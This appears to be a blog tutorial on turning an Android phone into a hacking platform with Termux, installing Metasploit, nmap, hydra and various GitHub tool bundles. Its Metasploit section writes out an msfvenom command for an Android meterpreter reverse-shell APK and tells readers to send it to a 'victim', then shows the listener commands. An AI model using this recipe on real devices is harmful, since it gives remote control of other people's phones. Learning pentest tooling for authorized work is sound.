Contents

Android Hacking with Termux

  

 

If you want to immerse yourself more about how to hack with Android, then Termux is a very good “App” to use an discover. I have been using it for a long time and I still love to see what you can do with it! And that with or without root privileges.


Because the possibilities with Termux are almost unlimited, I would not be able to cover everything in this article, but I will try my level best to provide you a good start.

Termux is a terminal emulator for Android with a Linux environment. A minimal base system is installed automatically and additional packages are available using the apt and dpkg package management, similar to Debian or Ubuntu.


 

Termux is only available on Android 5.0 or later


 

Features Termux Application


  • Secure
  • Customizable
  • Ready to Scale Up
  • Programming

 

Termux has some Extra features

  • Termux API
  • Termux Boot
  • Termux Float
  • Termux Styling
  • Termux Task
  • Termux Widget

 

INSTALL TERMUX

 

DOWNLOAD Termux

Open the Termux App in the Google Play Store https://play.google.com/store/apps/details?id=com.termux and click on download. After the Termux App is installed, you first have to do an update and an upgrade exactly like in a normal Linux system.


 

INSTALLING PACKAGES FROM APT REPOSITORY

In Termux it is recommended to use package manager pkg which is a wrapper for apt. It simplifies installing or upgrading packages by automatically updating apt lists so you don’t have to type apt update when installing or upgrading packages.

For myself, I always use the apt instead of pkg a kind of getting used to it. Here in this article, I would give a good example using pkg, but as you can see on the pictures, I am using on my side apt 

1
pkg update && pkg upgrade

For more information about available commands, you can either just run pkg without arguments or using help argument:

1
pkg help
1
apt help

 

Warning

If you prefer to use apt over pkg - never run it as root as you will mess up file permissions and SELinux contexts so you won’t be able to use it as a normal user.


 

If you want to immerse yourself more about how to hack with Android, then Termux is a very good ‘App’ to use an discover.

 


As you see above, Termux looks exactly like a Terminal in Linux and you can compare Termux with a minimal Linux Installation where you can install everything yourself and set up the way you like it.


 

Just like with Linux you can use the help function in Ter

1
(package) --help

 

Or install man for the manual pages

1
pkg install man

 

List all packages

1
pkg list-all

 

PYTHON AND PIP

Termux has completely switched to python3. Python2 no longer has support. But you can still install python 2 scripts. How to install python2 on Termux, I show this below. Pip packages are now automatically installed with python.


 

PYTHON 3 AND PIP 3

Termux has completely switched to python3. This is the command to use.

1
apt install python

 

PYTHON 2 AND PIP 2 TERMUX

For some scripts you still need python 2, this is how you install it. It is now not necessary to install pip 2, this is automatically included.

1
pkg install python2

 

SOME TEXT EDITORS


1
pkg install nano
1
pkg install vim
1
pkg install emacs
1
pkg install micro

 

Storage Settings


To grant storage permissions in Android go to Settings > Apps > Termux > Permissions and select storage, then run termux-setup-storage in Termux.


 

To access shared and external storage you need to run

1
termux-setup-storage

You will then be prompted to “Allow Termux access photos, media, and files on your device”, which you should allow. Executing termux-setup-storage  ensures that permission to shared storage is granted to Termux when running on Android 6.0 or later. That an app-private folder on external storage is created (if external storage exists).


 

INSTALL METASPLOIT FRAMEWORK


The world’s most used penetration testing framework.

Use the following commands to install the package (only for Android 7 or higher):

1
pkg install unstable-repo
1
pkg install metasploit

If your device running Android OS versions 5.x.x-6.x.x, use these commands instead (unstable-repo is not available for legacy installations):

1
curl -LO https://github.com/termux/termux-packages/files/3995119/metasploit_5.0.65-1_all.deb.gz
1
gunzip metasploit_5.0.65-1_all.deb.gz
1
dpkg -i metasploit_5.0.65-1_all.deb
1
apt -f install

Installation may take long time since additional Ruby gems will be installed. Do not close Termux sessions until installation finishes to avoid introducing of potential inconsistencies in $PREFIX.

 

Warning

Do not manually upgrade Metasploit installed through the package with editing contents of $PREFIX/opt/metasploit. This will likely break installation and result in dependency problems. Do not report issues if you did this.

To start simply type:

1
msfconsole

 

Metasploit Termux

Metasploit Termux


 

Use Metasploit

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=(Wlan\'s inet) LPORT=4444 R > /sdcard/test.apk

Wlan’s Inet is the IP address your connection is currently using. To know your Wlan’s inet open a new session and type ifconfig  and copy the inet of the Wlan and paste it into your payload (after LHOST=). Go to your file manager then find your payload name{test.apk} then send it to your victim.


 

The following step is to run metasploit-framework type this commands


1
msfconsole
1
use exploit/multi/handler
1
set payload android/meterpreter/reverse_tcp
1
set lhost (Wlan\'s inet)* set lport 4444
1
exploit

If the target is downloading the payload, you will see the meterpreter session starting. As usual with the “help” function you can see all the available commands.


 

If you want to immerse yourself more about how to hack with Android, then Termux is a very good ‘App’ to use an discover.

 

INSTALL UBUNTU ON ANDROID

Ubuntu chroot for Termux. This chroot provides the latest Ubuntu version (19.04 Disco Dingo). But before you use it, you need to install Wget and PRoot to install Ubuntu chroot in Termux.

1
pkg install proot wget

After you install Wget and PRoot, you can install Ubuntu chroot using this command:

1
mkdir -p ~/jails/ubuntu
1
cd ~/jails/ubuntu
1
wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh
1
bash ubuntu.sh

Or:

1
./ubuntu.sh

After Ubuntu chroot downloaded, you can run it by executing ./start-ubuntu.sh. If you are already inside your $HOME directory, you can run it with this command:

1
bash jails/ubuntu/start-ubuntu.sh

After installing the Ubuntu environment, you have to un-minimize the setup run:

1
unminimize

To turn on our Termux with some good pentest tool we will need first to install some primary packages as well, which will be required later.

1
apt install git net-tools curl

 

W3M INSTALL

w3m is a text-based web browser as well as a pager-like more' or less'. With w3m you can browse web pages through a terminal emulator window (xterm, rxvt or something like that). Moreover, w3m can be used as a text formatting tool that typesets HTML into plain text.

1
pkg install w3m
1
w3m --help
1
man w3m
1
w3m google.com

To exit press ctrl + z


 

SL INSTALL

You will see a moving train which you can control if the setup of Termux is running.

1
pkg install sl

 

install sl on Android - Termux

 

INSTALL TOP

“top” command allows you to see all the running processes. Type –help for more info / Type -q to quite the program.

1
pkg install top

 

FIGLET INSTALL

1
pkg install figlet

Usage

1
figlet hackingpassion.com

 

CMATRIX INSTALL

With this awesome terminal, you can really impress all your friends.

1
pkg install cmatrix

 

Install Toilet


1
pkg install toilet

Usage

1
toilet hackingpassion.com
1
toilet -f mono12 -F gay headleak

 

INSTALL VARIOUS HACKING TOOLS ON TERMUX

Warning: There are a lot of “Termux Hacking Tutorials” on the Internet which provide suspicious software meant to be used as hacking tools. Most of them are just clickbait and don’t actually work. Some of them force users to install malware on their devices.

Tools like aircrack-ng or tcpdump can be found in the Termux Root Packages repository. But remember that Aircrack-ng requires wifi monitor mode which is not available in most devices.


 

INSTALL NMAP

1
pkg install nmap

Utility for Network Discovery, Security Scanner, Port Scanner, & Network Exploration Tool.

Usage

1
nmap 127.0.0.1

 

INSTALL HYDRA

Hydra is one of the best password cracking and brute-forcing tool. It supports different services like telnet, ssh, ftp, etc. More information can be found in the official GitHub repository.

1
pkg install hydra

 

INSTALL SHODAN EYE ON TERMUX

Shodan Eye is a script I made in python. This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview. The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants, and everything in between. You can find everything using “your own” specified keywords.

A collection of search queries for Shodan has attached: “Shodan Dorks … The Internet of Sh*t” The information obtained with this tool can be applied in many areas, a small example: Network security, keep an eye on all devices in your company or at home that is confronted with the internet. Vulnerabilities. And so much more.

Shodan Eye can be installed and use very easy on Termux. This is a very big change, with old versions of Termux you had to make quite a few detours before you could install Shodan Eye. I have tested a lot, and it runs really well on Termux as well..!

1
git clone https://github.com/BullsEye0/shodan-eye.git
1
cd shodan-eye
1
pip install -r requirements.txt

Usage

1
python shodan-eye

You will be asked for a Shodan API key

Here in this article, you can read more about and the use of the Shodan Eye. Also, more info to find about the APK key that is needed. (Free)
Shodan Eye Ethical Hacking Tool Release


Shodan Eye - If you want to immerse yourself more about how to hack with Android, then Termux is a very good ‘App’ to use an discover.

 

Install Dorks Eye on Termux

Dorks Eye can also be used in Termux ..!

Dorks Eye is a script I made in python 3. With this tool, you can easily find Google Dorks. Dork Eye collects potentially vulnerable web pages and applications on the Internet or other awesome info that is picked up by Google’s search bots. You can save the output in a file so that you can view it at a later time. You can determine the number of searches yourself. The number of websites to display
Dorks Eye Google Hacking Dork Scraping and Searching Script

1
git clone https://github.com/BullsEye0/dorks-eye.git
1
cd dorks-eye
1
pip install -r requirements.txt

 

Usage Termux

1
python dorks-eye.py

Here is a video I make:

Android Hacking with Termux | Dorks Eye Google Dork Script


Video Android Hacking with Termux | Dorks Eye Google Dork Script


 

 


Become a member on LBRY
Plus earning LBRY for watching videos ♥️
Here an invitation link, so that we both benefit.
In this way, you also support my work.

https://lbry.tv/$/invite/@hackingpassion:9

Follow me on YouTube


 

INSTALLING GITHUB “HACKING TOOLS” ON YOUR TERMUX

There are a number of GitHub tools available. Please note, if your Android phone is not rooted then some of these tools will not work. In this article, we did not talk about rooting on a mobile phone. Maybe we will come back to this later in another article.


 

INSTALL LAZYMUX

Lazymux tools installer is very easy to use, only provided for lazy Termux users.

1
git clone https://github.com/Gameye98/Lazymux
1
cd Lazymux
1
python2 lazymux.py

 

INSTALL LAZYMUX on Android Termux

 


 

Install Toolx

Tool-X is a Kali Linux Tool installer. In the Tool-X there are 250+ hacking tools available for Termux. You can install any tool by a single click. Tool-X is specially made for Termux and GNURoot Debian Terminal. Tool-X is also available for Ubuntu.

1
git clone https://github.com/Rajkumrdusad/Tool-X.git
1
cd Tool-X
1
chmod +x install.aex
1
sh install.aex

Or:

1
./install.aex

 

Usage

1
Tool-X

 

Install Tool-X. is a Kali Linux Tool installer

 


 

IMPORTANT THINGS TO REMEMBER

  • This article was written for educational purposes and pentest only.
  • The author can not be held responsible for damages caused by the use of these resources.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Just remember, Performing any hacks without written permission is illegal ..!

Read also the Disclaimer


 

Finally

If you have any questions about this article, any feedback, suggestions if you want to share your thoughts, please feel free to do it using the below comment form.


 

 

By Bulls Eye

Jolanda de koff • email donate

My name is Jolanda de Koff and on the internet, I'm also known as Bulls Eye. Ethical Hacker, Penetration tester, Researcher, Programmer, Self Learner, and forever n00b. Not necessarily in that order. Like to make my own hacking tools and I sometimes share them with you. "You can create art & beauty with a computer and Hacking is not a hobby but a way of life ...

I ♥ open-source and Linux